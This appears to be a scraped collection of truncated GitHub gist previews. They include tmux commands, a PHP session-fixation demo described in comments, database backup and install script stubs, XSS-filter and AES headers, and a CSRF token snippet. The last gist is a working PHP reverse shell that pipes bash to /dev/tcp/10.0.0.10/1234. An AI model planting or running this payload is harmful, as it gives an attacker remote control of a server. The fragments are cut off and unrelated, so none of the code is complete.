start new:
tmux
start new with session name:
tmux new -s myname
<?php | |
// Demo for session fixation | |
// | |
// Attacker creates a session by visiting the page: http://famfamfam.com/sessionfixation.php | |
// Attacker gets their session ID out of the cookie (or in this case from the page) | |
// Attacker creates a URL such as http://famfamfam.com/sessionfixation.php?PHPSESSID=attackerssessionid and sends it to victim | |
// Victim clicks the URL (now both the attacker and victim are using the same session) | |
// Victim logs in | |
// Now the attacker is logged in to the victim's account too (same session!) |
#!/bin/bash | |
# Shell script to backup MySQL database | |
# Set these variables | |
MyUSER="" # DB_USERNAME | |
MyPASS="" # DB_PASSWORD | |
MyHOST="" # DB_HOSTNAME | |
# Backup Dest directory | |
DEST="" # /home/username/backups/DB |
<?php | |
/* | |
* XSS filter, recursively handles HTML tags & UTF encoding | |
* Optionally handles base64 encoding | |
* | |
* ***DEPRECATION RECOMMENDED*** Not updated or maintained since 2011 | |
* A MAINTAINED & BETTER ALTERNATIVE => kses | |
* https://github.com/RichardVasquez/kses/ | |
* | |
* This was built from numerous sources |
/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - */ | |
/* AES implementation in JavaScript (c) Chris Veness 2005-2011 */ | |
/* - see http://csrc.nist.gov/publications/PubsFIPS.html#197 */ | |
/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - */ | |
var Aes = {}; // Aes namespace | |
/** | |
* AES Cipher function: encrypt 'input' state with Rijndael algorithm | |
* applies Nr rounds (10/12/14) using key schedule w for 'add round key' stage |
#!/bin/sh | |
if [ "root" != "$(whoami)" ]; then | |
echo "You must run this command as root" 1>&2 | |
exit 1 | |
fi | |
set -x | |
# Download and extract | |
if [ ! -z "${1}" ]; then |
<?php | |
// See: http://blog.ircmaxell.com/2013/02/preventing-csrf-attacks.html | |
// Start a session (which should use cookies over HTTP only). | |
session_start(); | |
// Create a new CSRF token. | |
if (! isset($_SESSION['csrf_token'])) { | |
$_SESSION['csrf_token'] = base64_encode(openssl_random_pseudo_bytes(32)); | |
} |
/* | |
* Copyright (c) 2013 Google Inc. | |
* | |
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except | |
* in compliance with the License. You may obtain a copy of the License at | |
* | |
* http://www.apache.org/licenses/LICENSE-2.0 | |
* | |
* Unless required by applicable law or agreed to in writing, software distributed under the License | |
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express |
Let's have some command-line fun with curl, [jq][1], and the [new GitHub Search API][2].
Today we're looking for:
<?php | |
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); |